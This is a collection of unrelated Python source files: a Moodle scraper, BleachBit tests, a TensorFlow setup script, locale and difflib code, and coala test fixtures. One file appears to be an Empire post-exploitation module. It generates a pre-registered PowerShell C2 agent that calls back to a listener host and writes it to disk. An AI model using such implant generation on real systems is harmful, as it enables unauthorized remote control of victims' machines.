from moodlefuse.moodle.courses import course_errors
from moodlefuse.moodle import exception, attributes
from moodlefuse.core import config
from moodlefuse import moodle
class CoreEmulator(Emulator):
def __init__(self, username, password):
super(CoreEmulator, self).__init__(username, password)
self.setup_emulator()
def setup_emulator(self):
self.browser = Browser()
self.browser.set_handle_robots(False)
self.browser.addheaders = moodle.USER_AGENT
self.cookiejar = CookieJar()
self.browser.set_cookiejar(self.cookiejar)
def session_expired(self):
return self.browser.geturl().endswith(moodle.LOGIN_LOCATION)
@throws_moodlefuse_error(exception.LoginException)
def login(self):
self.open_login_page(self.browser.open)
self.browser.select_form(
predicate=lambda form: form.attrs.get('id') == attributes.LOGIN
)
self.browser.form.set_value(self.username, name='username')
self.browser.form.set_value(self.password, name='password')
resp = self.browser.submit()
if resp.geturl().endswith(moodle.LOGIN_LOCATION):
raise Exception
@throws_moodlefuse_error(resource_errors.UnableToDownloadResource)
def download(self, destination, source):
source = str(source)
if not source.startswith('http://') and not source.startswith('file://'):
source = config['TEST_DATA'] + '/' + source
self.browser.retrieve(source, destination)
def open_link(self, url):
response = self.browser.open(url)
return BeautifulSoup(response.read())
def check_form_checkbox(self, checkboxname):
self.browser.find_control(checkboxname).items[0].selected = True
def uncheck_form_checkbox(self, checkboxname):
self.browser.find_control(checkboxname).items[0].selected = False
def add_form_content(self, inputname, content):
self.browser.form.set_value(content, name=inputname)
def close_form(self):
self.browser.submit()
def set_form_to_first_form(self):
self.browser.select_form(nr=0)
def set_form_to_form_with_control_value(self, value):
for form in self.browser.forms():
for control in form.controls:
if control.value == value:
self.browser.form = form
@throws_moodlefuse_error(exception.UnableToToggleEditing)
def turn_course_editing_on(self):
self.set_form_to_form_with_control_value(moodle.EDIT_ON_MOODLE_BUTTON_TEXT)
response = self.browser.submit()
return BeautifulSoup(response.read())
def _setup_assignments_for_parsing(self, submission_filter):
self.set_form_to_form_with_control_value('Save and update table')
self.browser.form["filter"] = [submission_filter]
self.browser.form["perpage"] = ["100"]
self.uncheck_form_checkbox('quickgrading')
response = self.browser.submit()
return BeautifulSoup(response.read())
def filter_assignment_submissions(self):
return self._setup_assignments_for_parsing("submitted")
def unfilter_assignment_submissions(self):
return self._setup_assignments_for_parsing("")
@throws_moodlefuse_error(exception.UnableToToggleEditing)
def turn_course_editing_off(self):
self.set_form_to_form_with_control_value(moodle.EDIT_OFF_MOODLE_BUTTON_TEXT)
response = self.browser.submit()
return BeautifulSoup(response.read())
@throws_moodlefuse_error(course_errors.InvalidMoodleIndex)
def get_courses(self):
return self.open_link(config['MOODLE_INDEX_ADDRESS'])
@throws_moodlefuse_error(course_errors.UnableToObtainCategoryList)
def get_course_categories(self, url):
return self.open_link(url)
@throws_moodlefuse_error(resource_errors.UnableToObtainResourceList)
def get_course_resource_names(self, url):
return self.open_link(url)
def close(self):
self.browser.close() | unknown | codeparrot/codeparrot-clean | ||
# vim: ts=4:sw=4:expandtab
# -*- coding: UTF-8 -*-
# BleachBit
# Copyright (C) 2008-2015 Andrew Ziem
# http://bleachbit.sourceforge.net
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Test case for module Unix
"""
import os
import sys
import unittest
sys.path.append('.')
import bleachbit.Common
from bleachbit.Unix import *
class UnixTestCase(unittest.TestCase):
"""Test case for module Unix"""
def setUp(self):
"""Initialize unit tests"""
self.locales = Locales()
def test_apt_autoclean(self):
"""Unit test for method apt_autoclean()"""
if 0 != os.geteuid() or not FileUtilities.exe_exists('apt-get'):
self.assertRaises(RuntimeError, apt_autoclean)
else:
bytes_freed = apt_autoclean()
self.assert_(isinstance(bytes_freed, (int, long)))
def test_is_broken_xdg_desktop(self):
"""Unit test for is_broken_xdg_desktop()"""
menu_dirs = ['/usr/share/applications',
'/usr/share/autostart',
'/usr/share/gnome/autostart',
'/usr/share/gnome/apps',
'/usr/share/mimelnk',
'/usr/share/applnk-redhat/',
'/usr/local/share/applications/']
for dirname in menu_dirs:
for filename in [fn for fn in FileUtilities.children_in_directory(dirname, False)
if fn.endswith('.desktop')]:
self.assert_(type(is_broken_xdg_desktop(filename) is bool))
def test_is_running(self):
# Fedora 11 doesn't need realpath but Ubuntu 9.04 uses symlink
# from /usr/bin/python to python2.6
exe = os.path.basename(os.path.realpath(sys.executable))
self.assertTrue(is_running(exe))
def test_locale_to_language(self):
"""Unit test for locale_to_language()"""
tests = [('en', 'en'),
('en_US', 'en'),
('en_US@piglatin', 'en'),
('en_US.utf8', 'en'),
('klingon', 'klingon'),
('pl.ISO8859-2', 'pl'),
('sr_Latn', 'sr'),
('zh_TW.Big5', 'zh')]
for test in tests:
self.assertEqual(locale_to_language(test[0]), test[1])
self.assertRaises(ValueError, locale_to_language, 'default')
self.assertRaises(ValueError, locale_to_language, 'C')
self.assertRaises(ValueError, locale_to_language, 'English')
def test_locale_globex(self):
"""Unit test for locale_globex"""
locale = locale_globex('/bin/ls', '(ls)$').next()
self.assertEqual(locale, ('ls', '/bin/ls'))
fakepath = '/usr/share/omf/gedit/gedit-es.omf'
def test_yield(pathname, regex):
"""Replacement for globex()"""
yield fakepath
old_globex = FileUtilities.globex
FileUtilities.globex = test_yield
func = locale_globex('/usr/share/omf/*/*-*.omf', '-([a-z]{2}).omf$')
actual = func.next()
expect = ('es', fakepath)
self.assertEqual(
actual, expect, "Expected '%s' but got '%s'" % (expect, actual))
FileUtilities.globex = old_globex
def test_localization_paths(self):
"""Unit test for localization_paths()"""
from xml.dom.minidom import parseString
configpath = parseString(
'<path location="/usr/share/locale/" />').firstChild
locales.add_xml(configpath)
counter = 0
for path in locales.localization_paths(['en']):
self.assert_(os.path.lexists(path))
# self.assert_(path.startswith('/usr/share/locale'))
# /usr/share/locale/en_* should be ignored
self.assert_(path.find('/en_') == -1)
counter += 1
self.assert_(
counter > 0, 'Zero files deleted by localization cleaner. This may be an error unless you really deleted all the files.')
def test_native_name(self):
"""Unit test for native_name()"""
tests = [('en', 'English'),
('es', 'Español')]
for test in tests:
self.assertEqual(self.locales.native_name(test[0]), test[1])
def test_rotated_logs(self):
"""Unit test for rotated_logs()"""
for path in rotated_logs():
self.assert_(os.path.exists(path),
"Rotated log path '%s' does not exist" % path)
def test_start_with_computer(self):
"""Unit test for start_with_computer*"""
b = start_with_computer_check()
self.assert_(isinstance(b, bool))
if not os.path.exists(bleachbit.Common.launcher_path) and \
os.path.exists('bleachbit.desktop'):
# this happens when BleachBit is not installed
bleachbit.Common.launcher_path = 'bleachbit.desktop'
# opposite setting
start_with_computer(not b)
two_b = start_with_computer_check()
self.assert_(isinstance(two_b, bool))
self.assertEqual(b, not two_b)
# original setting
start_with_computer(b)
three_b = start_with_computer_check()
self.assert_(isinstance(b, bool))
self.assertEqual(b, three_b)
def test_wine_to_linux_path(self):
"""Unit test for wine_to_linux_path()"""
tests = [("/home/foo/.wine",
"C:\\Program Files\\NSIS\\NSIS.exe",
"/home/foo/.wine/drive_c/Program Files/NSIS/NSIS.exe")]
for test in tests:
self.assertEqual(wine_to_linux_path(test[0], test[1]), test[2])
def test_yum_clean(self):
"""Unit test for yum_clean()"""
if 0 != os.geteuid() or os.path.exists('/var/run/yum.pid') \
or not FileUtilities.exe_exists('yum'):
self.assertRaises(RuntimeError, yum_clean)
else:
bytes_freed = yum_clean()
self.assert_(isinstance(bytes_freed, (int, long)))
print 'debug: yum bytes cleaned %d', bytes_freed
def suite():
return unittest.makeSuite(UnixTestCase)
if __name__ == '__main__' and 'posix' == os.name:
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import fnmatch
import os
import platform
import re
import sys
from setuptools import find_packages, setup, Command, Extension
from setuptools.command.install import install as InstallCommandBase
from setuptools.dist import Distribution
_VERSION = '0.10.0'
numpy_version = "1.8.2"
if platform.system() == "Darwin":
# There are bugs with numpy pip installation on OS X prior to
# 1.10.1, so on mac we require a higher version than on other
# platforms.
numpy_version = "1.10.1"
REQUIRED_PACKAGES = [
'numpy >= %s' % numpy_version,
'six >= 1.10.0',
'protobuf == 3.0.0b2',
]
# python3 requires wheel 0.26
if sys.version_info.major == 3:
REQUIRED_PACKAGES.append('wheel >= 0.26')
else:
REQUIRED_PACKAGES.append('wheel')
# mock comes with unittest.mock for python3, need to install for python2
REQUIRED_PACKAGES.append('mock >= 2.0.0')
# pylint: disable=line-too-long
CONSOLE_SCRIPTS = [
'tensorboard = tensorflow.tensorboard.tensorboard:main',
]
# pylint: enable=line-too-long
TEST_PACKAGES = [
'scipy >= 0.15.1',
]
class BinaryDistribution(Distribution):
def is_pure(self):
return False
class InstallCommand(InstallCommandBase):
"""Override the dir where the headers go."""
def finalize_options(self):
ret = InstallCommandBase.finalize_options(self)
self.install_headers = os.path.join(self.install_purelib,
'tensorflow', 'include')
return ret
class InstallHeaders(Command):
"""Override how headers are copied.
The install_headers that comes with setuptools copies all files to
the same directory. But we need the files to be in a specific directory
hierarchy for -I <include_dir> to work correctly.
"""
description = 'install C/C++ header files'
user_options = [('install-dir=', 'd',
'directory to install header files to'),
('force', 'f',
'force installation (overwrite existing files)'),
]
boolean_options = ['force']
def initialize_options(self):
self.install_dir = None
self.force = 0
self.outfiles = []
def finalize_options(self):
self.set_undefined_options('install',
('install_headers', 'install_dir'),
('force', 'force'))
def mkdir_and_copy_file(self, header):
install_dir = os.path.join(self.install_dir, os.path.dirname(header))
# Get rid of some extra intervening directories so we can have fewer
# directories for -I
install_dir = re.sub('/google/protobuf/src', '', install_dir)
# Copy eigen code into tensorflow/include.
# A symlink would do, but the wheel file that gets created ignores
# symlink within the directory hierarchy.
# NOTE(keveman): Figure out how to customize bdist_wheel package so
# we can do the symlink.
if 'external/eigen_archive/' in install_dir:
extra_dir = install_dir.replace('external/eigen_archive', '')
if not os.path.exists(extra_dir):
self.mkpath(extra_dir)
self.copy_file(header, extra_dir)
if not os.path.exists(install_dir):
self.mkpath(install_dir)
return self.copy_file(header, install_dir)
def run(self):
hdrs = self.distribution.headers
if not hdrs:
return
self.mkpath(self.install_dir)
for header in hdrs:
(out, _) = self.mkdir_and_copy_file(header)
self.outfiles.append(out)
def get_inputs(self):
return self.distribution.headers or []
def get_outputs(self):
return self.outfiles
def find_files(pattern, root):
"""Return all the files matching pattern below root dir."""
for path, _, files in os.walk(root):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(path, filename)
matches = ['../' + x for x in find_files('*', 'external') if '.py' not in x]
headers = (list(find_files('*.h', 'tensorflow/core')) +
list(find_files('*.h', 'google/protobuf/src')) +
list(find_files('*', 'third_party/eigen3')) +
list(find_files('*', 'external/eigen_archive')))
setup(
name='tensorflow',
version=_VERSION,
description='TensorFlow helps the tensors flow',
long_description='',
url='http://tensorflow.org/',
author='Google Inc.',
author_email='opensource@google.com',
# Contained modules and scripts.
packages=find_packages(),
entry_points={
'console_scripts': CONSOLE_SCRIPTS,
},
headers=headers,
install_requires=REQUIRED_PACKAGES,
tests_require=REQUIRED_PACKAGES + TEST_PACKAGES,
# Add in any packaged data.
include_package_data=True,
package_data={
'tensorflow': ['python/_pywrap_tensorflow.so',
'tensorboard/dist/index.html',
'tensorboard/dist/tf-tensorboard.html',
'tensorboard/lib/css/global.css',
'tensorboard/TAG',
] + matches,
},
zip_safe=False,
distclass=BinaryDistribution,
cmdclass={
'install_headers': InstallHeaders,
'install': InstallCommand,
},
# PyPI package information.
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2.7',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Libraries',
],
license='Apache 2.0',
keywords='tensorflow tensor machine learning',
) | unknown | codeparrot/codeparrot-clean | ||
"""A minimal subset of the locale module used at interpreter startup
(imported by the _io module), in order to reduce startup time.
Don't import directly from third-party code; use the `locale` module instead!
"""
import sys
import _locale
if sys.platform.startswith("win"):
def getpreferredencoding(do_setlocale=True):
return _locale._getdefaultlocale()[1]
else:
try:
_locale.CODESET
except AttributeError:
def getpreferredencoding(do_setlocale=True):
# This path for legacy systems needs the more complex
# getdefaultlocale() function, import the full locale module.
import locale
return locale.getpreferredencoding(do_setlocale)
else:
def getpreferredencoding(do_setlocale=True):
assert not do_setlocale
result = _locale.nl_langinfo(_locale.CODESET)
if not result and sys.platform == 'darwin':
# nl_langinfo can return an empty string
# when the setting has an invalid value.
# Default to UTF-8 in that case because
# UTF-8 is the default charset on OSX and
# returning nothing will crash the
# interpreter.
result = 'UTF-8'
return result | unknown | codeparrot/codeparrot-clean | ||
from coalib.bearlib.aspects import Taste, aspectclass
from coalib.bearlib.aspects.base import aspectbase
import pytest
@pytest.fixture
def RootAspect():
"""
An exclusive Root aspectclass for unit tests.
"""
class RootAspect(aspectbase, metaclass=aspectclass):
parent = None
_tastes = {}
return RootAspect
@pytest.fixture
def SubAspect_tastes():
"""
Taste definitions for an exclusive SubAspect class for unit tests.
"""
return {
'salty': Taste[str](
'The saltiness', ('high', 'low'), default='low'),
'sweet': Taste[int](
'The sweetness', (1, 23, 45), default=23,
languages=('py', )),
'sour': Taste[bool](
'Is it sour?', (True, False), default=False),
}
@pytest.fixture
def SubAspect_taste_values():
"""
Taste definitions for an exclusive SubAspect class for unit tests.
"""
return {
'salty': 'high',
'sweet': 45,
'sour': True,
}
@pytest.fixture
def SubAspect_docs():
"""
Docs definitions for an exclusive SubAspect class for unit tests.
"""
class docs:
example = 'An example'
example_language = 'The example language'
importance_reason = 'The reason of importance'
fix_suggestions = 'Suggestions for fixing'
return docs
@pytest.fixture
def SubAspect(RootAspect, SubAspect_docs, SubAspect_tastes):
"""
An exclusive SubAspect class for unit tests.
"""
@RootAspect.subaspect
class SubAspect:
"""
Definition
"""
docs = SubAspect_docs
salty = SubAspect_tastes['salty']
sweet = SubAspect_tastes['sweet']
sour = SubAspect_tastes['sour']
return SubAspect
@pytest.fixture
def SubSubAspect_tastes():
"""
Taste definitions for an exclusive SubSubAspect class for unit tests.
"""
return {
'salty': Taste[str](
'The saltiness', ('high', 'low'), default='low'),
'sweet': Taste[int](
'The sweetness', (1, 23, 45), default=23,
languages=('py', )),
'sour': Taste[bool](
'Is it sour?', (True, False), default=False),
}
@pytest.fixture
def SubSubAspect_taste_values():
"""
Taste definitions for an exclusive SubSubAspect class for unit tests.
"""
return {
'salty': 'high',
'sweet': 45,
'sour': True,
}
@pytest.fixture
def SubSubAspect_docs():
"""
Docs definitions for an exclusive SubSubAspect class for unit tests.
"""
class docs:
example = 'An example'
example_language = 'The example language'
importance_reason = 'The reason of importance'
fix_suggestions = 'Suggestions for fixing'
return docs
@pytest.fixture
def SubSubAspect(SubAspect, SubSubAspect_docs, SubAspect_tastes):
"""
An exclusive SubAspect class for unit tests.
"""
@SubAspect.subaspect
class SubSubAspect:
"""
Definition
"""
docs = SubAspect_docs
salty = SubAspect_tastes['salty']
sweet = SubAspect_tastes['sweet']
sour = SubAspect_tastes['sour']
return SubSubAspect | unknown | codeparrot/codeparrot-clean | ||
import os
import string
from pydispatch import dispatcher
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Generate Agent',
'Author': ['@harmj0y'],
'Description': ("Generates an agent code instance for a specified listener, "
"pre-staged, and register the agent in the database. This allows "
"the agent to begin beconing behavior immediately."),
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate the agent for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language to generate for the agent.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description' : 'Output file to write the agent code to.',
'Required' : True,
'Value' : '/tmp/agent'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def execute(self):
listenerName = self.options['Listener']['Value']
language = self.options['Language']['Value']
outFile = self.options['OutFile']['Value']
if listenerName not in self.mainMenu.listeners.activeListeners:
print helpers.color("[!] Error: %s not an active listener")
return None
activeListener = self.mainMenu.listeners.activeListeners[listenerName]
chars = string.uppercase + string.digits
sessionID = helpers.random_string(length=8, charset=chars)
stagingKey = activeListener['options']['StagingKey']['Value']
delay = activeListener['options']['DefaultDelay']['Value']
jitter = activeListener['options']['DefaultJitter']['Value']
profile = activeListener['options']['DefaultProfile']['Value']
killDate = activeListener['options']['KillDate']['Value']
workingHours = activeListener['options']['WorkingHours']['Value']
lostLimit = activeListener['options']['DefaultLostLimit']['Value']
if 'Host' in activeListener['options']:
host = activeListener['options']['Host']['Value']
else:
host = ''
# add the agent
self.mainMenu.agents.add_agent(sessionID, '0.0.0.0', delay, jitter, profile, killDate, workingHours, lostLimit, listener=listenerName, language=language)
# get the agent's session key
sessionKey = self.mainMenu.agents.get_agent_session_key_db(sessionID)
agentCode = self.mainMenu.listeners.loadedListeners[activeListener['moduleName']].generate_agent(activeListener['options'], language=language)
if language.lower() == 'powershell':
agentCode += "\nInvoke-Empire -Servers @('%s') -StagingKey '%s' -SessionKey '%s' -SessionID '%s';" % (host, stagingKey, sessionKey, sessionID)
else:
print helpers.color('[!] Only PowerShell agent generation is supported at this time.')
return ''
# TODO: python agent generation - need to patch in crypto functions from the stager...
print helpers.color("[+] Pre-generated agent '%s' now registered." % (sessionID))
# increment the supplied file name appropriately if it already exists
i = 1
outFileOrig = outFile
while os.path.exists(outFile):
parts = outFileOrig.split('.')
if len(parts) == 1:
base = outFileOrig
ext = None
else:
base = '.'.join(parts[0:-1])
ext = parts[-1]
if ext:
outFile = "%s%s.%s" % (base, i, ext)
else:
outFile = "%s%s" % (base, i)
i += 1
f = open(outFile, 'w')
f.write(agentCode)
f.close()
print helpers.color("[*] %s agent code for listener %s with sessionID '%s' written out to %s" % (language, listenerName, sessionID, outFile))
print helpers.color("[*] Run sysinfo command after agent starts checking in!") | unknown | codeparrot/codeparrot-clean | ||
#! /usr/bin/env python3
"""
Module difflib -- helpers for computing deltas between objects.
Function get_close_matches(word, possibilities, n=3, cutoff=0.6):
Use SequenceMatcher to return list of the best "good enough" matches.
Function context_diff(a, b):
For two lists of strings, return a delta in context diff format.
Function ndiff(a, b):
Return a delta: the difference between `a` and `b` (lists of strings).
Function restore(delta, which):
Return one of the two sequences that generated an ndiff delta.
Function unified_diff(a, b):
For two lists of strings, return a delta in unified diff format.
Class SequenceMatcher:
A flexible class for comparing pairs of sequences of any type.
Class Differ:
For producing human-readable deltas from sequences of lines of text.
Class HtmlDiff:
For producing HTML side by side comparison with change highlights.
"""
__all__ = ['get_close_matches', 'ndiff', 'restore', 'SequenceMatcher',
'Differ','IS_CHARACTER_JUNK', 'IS_LINE_JUNK', 'context_diff',
'unified_diff', 'HtmlDiff', 'Match']
import warnings
import heapq
from collections import namedtuple as _namedtuple
Match = _namedtuple('Match', 'a b size')
def _calculate_ratio(matches, length):
if length:
return 2.0 * matches / length
return 1.0
class SequenceMatcher:
"""
SequenceMatcher is a flexible class for comparing pairs of sequences of
any type, so long as the sequence elements are hashable. The basic
algorithm predates, and is a little fancier than, an algorithm
published in the late 1980's by Ratcliff and Obershelp under the
hyperbolic name "gestalt pattern matching". The basic idea is to find
the longest contiguous matching subsequence that contains no "junk"
elements (R-O doesn't address junk). The same idea is then applied
recursively to the pieces of the sequences to the left and to the right
of the matching subsequence. This does not yield minimal edit
sequences, but does tend to yield matches that "look right" to people.
SequenceMatcher tries to compute a "human-friendly diff" between two
sequences. Unlike e.g. UNIX(tm) diff, the fundamental notion is the
longest *contiguous* & junk-free matching subsequence. That's what
catches peoples' eyes. The Windows(tm) windiff has another interesting
notion, pairing up elements that appear uniquely in each sequence.
That, and the method here, appear to yield more intuitive difference
reports than does diff. This method appears to be the least vulnerable
to synching up on blocks of "junk lines", though (like blank lines in
ordinary text files, or maybe "<P>" lines in HTML files). That may be
because this is the only method of the 3 that has a *concept* of
"junk" <wink>.
Example, comparing two strings, and considering blanks to be "junk":
>>> s = SequenceMatcher(lambda x: x == " ",
... "private Thread currentThread;",
... "private volatile Thread currentThread;")
>>>
.ratio() returns a float in [0, 1], measuring the "similarity" of the
sequences. As a rule of thumb, a .ratio() value over 0.6 means the
sequences are close matches:
>>> print(round(s.ratio(), 3))
0.866
>>>
If you're only interested in where the sequences match,
.get_matching_blocks() is handy:
>>> for block in s.get_matching_blocks():
... print("a[%d] and b[%d] match for %d elements" % block)
a[0] and b[0] match for 8 elements
a[8] and b[17] match for 21 elements
a[29] and b[38] match for 0 elements
Note that the last tuple returned by .get_matching_blocks() is always a
dummy, (len(a), len(b), 0), and this is the only case in which the last
tuple element (number of elements matched) is 0.
If you want to know how to change the first sequence into the second,
use .get_opcodes():
>>> for opcode in s.get_opcodes():
... print("%6s a[%d:%d] b[%d:%d]" % opcode)
equal a[0:8] b[0:8]
insert a[8:8] b[8:17]
equal a[8:29] b[17:38]
See the Differ class for a fancy human-friendly file differencer, which
uses SequenceMatcher both to compare sequences of lines, and to compare
sequences of characters within similar (near-matching) lines.
See also function get_close_matches() in this module, which shows how
simple code building on SequenceMatcher can be used to do useful work.
Timing: Basic R-O is cubic time worst case and quadratic time expected
case. SequenceMatcher is quadratic time for the worst case and has
expected-case behavior dependent in a complicated way on how many
elements the sequences have in common; best case time is linear.
Methods:
__init__(isjunk=None, a='', b='')
Construct a SequenceMatcher.
set_seqs(a, b)
Set the two sequences to be compared.
set_seq1(a)
Set the first sequence to be compared.
set_seq2(b)
Set the second sequence to be compared.
find_longest_match(alo, ahi, blo, bhi)
Find longest matching block in a[alo:ahi] and b[blo:bhi].
get_matching_blocks()
Return list of triples describing matching subsequences.
get_opcodes()
Return list of 5-tuples describing how to turn a into b.
ratio()
Return a measure of the sequences' similarity (float in [0,1]).
quick_ratio()
Return an upper bound on .ratio() relatively quickly.
real_quick_ratio()
Return an upper bound on ratio() very quickly.
"""
def __init__(self, isjunk=None, a='', b='', autojunk=True):
"""Construct a SequenceMatcher.
Optional arg isjunk is None (the default), or a one-argument
function that takes a sequence element and returns true iff the
element is junk. None is equivalent to passing "lambda x: 0", i.e.
no elements are considered to be junk. For example, pass
lambda x: x in " \\t"
if you're comparing lines as sequences of characters, and don't
want to synch up on blanks or hard tabs.
Optional arg a is the first of two sequences to be compared. By
default, an empty string. The elements of a must be hashable. See
also .set_seqs() and .set_seq1().
Optional arg b is the second of two sequences to be compared. By
default, an empty string. The elements of b must be hashable. See
also .set_seqs() and .set_seq2().
Optional arg autojunk should be set to False to disable the
"automatic junk heuristic" that treats popular elements as junk
(see module documentation for more information).
"""
# Members:
# a
# first sequence
# b
# second sequence; differences are computed as "what do
# we need to do to 'a' to change it into 'b'?"
# b2j
# for x in b, b2j[x] is a list of the indices (into b)
# at which x appears; junk and popular elements do not appear
# fullbcount
# for x in b, fullbcount[x] == the number of times x
# appears in b; only materialized if really needed (used
# only for computing quick_ratio())
# matching_blocks
# a list of (i, j, k) triples, where a[i:i+k] == b[j:j+k];
# ascending & non-overlapping in i and in j; terminated by
# a dummy (len(a), len(b), 0) sentinel
# opcodes
# a list of (tag, i1, i2, j1, j2) tuples, where tag is
# one of
# 'replace' a[i1:i2] should be replaced by b[j1:j2]
# 'delete' a[i1:i2] should be deleted
# 'insert' b[j1:j2] should be inserted
# 'equal' a[i1:i2] == b[j1:j2]
# isjunk
# a user-supplied function taking a sequence element and
# returning true iff the element is "junk" -- this has
# subtle but helpful effects on the algorithm, which I'll
# get around to writing up someday <0.9 wink>.
# DON'T USE! Only __chain_b uses this. Use isbjunk.
# bjunk
# the items in b for which isjunk is True.
# bpopular
# nonjunk items in b treated as junk by the heuristic (if used).
self.isjunk = isjunk
self.a = self.b = None
self.autojunk = autojunk
self.set_seqs(a, b)
def set_seqs(self, a, b):
"""Set the two sequences to be compared.
>>> s = SequenceMatcher()
>>> s.set_seqs("abcd", "bcde")
>>> s.ratio()
0.75
"""
self.set_seq1(a)
self.set_seq2(b)
def set_seq1(self, a):
"""Set the first sequence to be compared.
The second sequence to be compared is not changed.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.set_seq1("bcde")
>>> s.ratio()
1.0
>>>
SequenceMatcher computes and caches detailed information about the
second sequence, so if you want to compare one sequence S against
many sequences, use .set_seq2(S) once and call .set_seq1(x)
repeatedly for each of the other sequences.
See also set_seqs() and set_seq2().
"""
if a is self.a:
return
self.a = a
self.matching_blocks = self.opcodes = None
def set_seq2(self, b):
"""Set the second sequence to be compared.
The first sequence to be compared is not changed.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.set_seq2("abcd")
>>> s.ratio()
1.0
>>>
SequenceMatcher computes and caches detailed information about the
second sequence, so if you want to compare one sequence S against
many sequences, use .set_seq2(S) once and call .set_seq1(x)
repeatedly for each of the other sequences.
See also set_seqs() and set_seq1().
"""
if b is self.b:
return
self.b = b
self.matching_blocks = self.opcodes = None
self.fullbcount = None
self.__chain_b()
# For each element x in b, set b2j[x] to a list of the indices in
# b where x appears; the indices are in increasing order; note that
# the number of times x appears in b is len(b2j[x]) ...
# when self.isjunk is defined, junk elements don't show up in this
# map at all, which stops the central find_longest_match method
# from starting any matching block at a junk element ...
# also creates the fast isbjunk function ...
# b2j also does not contain entries for "popular" elements, meaning
# elements that account for more than 1 + 1% of the total elements, and
# when the sequence is reasonably large (>= 200 elements); this can
# be viewed as an adaptive notion of semi-junk, and yields an enormous
# speedup when, e.g., comparing program files with hundreds of
# instances of "return NULL;" ...
# note that this is only called when b changes; so for cross-product
# kinds of matches, it's best to call set_seq2 once, then set_seq1
# repeatedly
def __chain_b(self):
# Because isjunk is a user-defined (not C) function, and we test
# for junk a LOT, it's important to minimize the number of calls.
# Before the tricks described here, __chain_b was by far the most
# time-consuming routine in the whole module! If anyone sees
# Jim Roskind, thank him again for profile.py -- I never would
# have guessed that.
# The first trick is to build b2j ignoring the possibility
# of junk. I.e., we don't call isjunk at all yet. Throwing
# out the junk later is much cheaper than building b2j "right"
# from the start.
b = self.b
self.b2j = b2j = {}
for i, elt in enumerate(b):
indices = b2j.setdefault(elt, [])
indices.append(i)
# Purge junk elements
self.bjunk = junk = set()
isjunk = self.isjunk
if isjunk:
for elt in b2j.keys():
if isjunk(elt):
junk.add(elt)
for elt in junk: # separate loop avoids separate list of keys
del b2j[elt]
# Purge popular elements that are not junk
self.bpopular = popular = set()
n = len(b)
if self.autojunk and n >= 200:
ntest = n // 100 + 1
for elt, idxs in b2j.items():
if len(idxs) > ntest:
popular.add(elt)
for elt in popular: # ditto; as fast for 1% deletion
del b2j[elt]
def isbjunk(self, item):
"Deprecated; use 'item in SequenceMatcher().bjunk'."
warnings.warn("'SequenceMatcher().isbjunk(item)' is deprecated;\n"
"use 'item in SMinstance.bjunk' instead.",
DeprecationWarning, 2)
return item in self.bjunk
def isbpopular(self, item):
"Deprecated; use 'item in SequenceMatcher().bpopular'."
warnings.warn("'SequenceMatcher().isbpopular(item)' is deprecated;\n"
"use 'item in SMinstance.bpopular' instead.",
DeprecationWarning, 2)
return item in self.bpopular
def find_longest_match(self, alo, ahi, blo, bhi):
"""Find longest matching block in a[alo:ahi] and b[blo:bhi].
If isjunk is not defined:
Return (i,j,k) such that a[i:i+k] is equal to b[j:j+k], where
alo <= i <= i+k <= ahi
blo <= j <= j+k <= bhi
and for all (i',j',k') meeting those conditions,
k >= k'
i <= i'
and if i == i', j <= j'
In other words, of all maximal matching blocks, return one that
starts earliest in a, and of all those maximal matching blocks that
start earliest in a, return the one that starts earliest in b.
>>> s = SequenceMatcher(None, " abcd", "abcd abcd")
>>> s.find_longest_match(0, 5, 0, 9)
Match(a=0, b=4, size=5)
If isjunk is defined, first the longest matching block is
determined as above, but with the additional restriction that no
junk element appears in the block. Then that block is extended as
far as possible by matching (only) junk elements on both sides. So
the resulting block never matches on junk except as identical junk
happens to be adjacent to an "interesting" match.
Here's the same example as before, but considering blanks to be
junk. That prevents " abcd" from matching the " abcd" at the tail
end of the second sequence directly. Instead only the "abcd" can
match, and matches the leftmost "abcd" in the second sequence:
>>> s = SequenceMatcher(lambda x: x==" ", " abcd", "abcd abcd")
>>> s.find_longest_match(0, 5, 0, 9)
Match(a=1, b=0, size=4)
If no blocks match, return (alo, blo, 0).
>>> s = SequenceMatcher(None, "ab", "c")
>>> s.find_longest_match(0, 2, 0, 1)
Match(a=0, b=0, size=0)
"""
# CAUTION: stripping common prefix or suffix would be incorrect.
# E.g.,
# ab
# acab
# Longest matching block is "ab", but if common prefix is
# stripped, it's "a" (tied with "b"). UNIX(tm) diff does so
# strip, so ends up claiming that ab is changed to acab by
# inserting "ca" in the middle. That's minimal but unintuitive:
# "it's obvious" that someone inserted "ac" at the front.
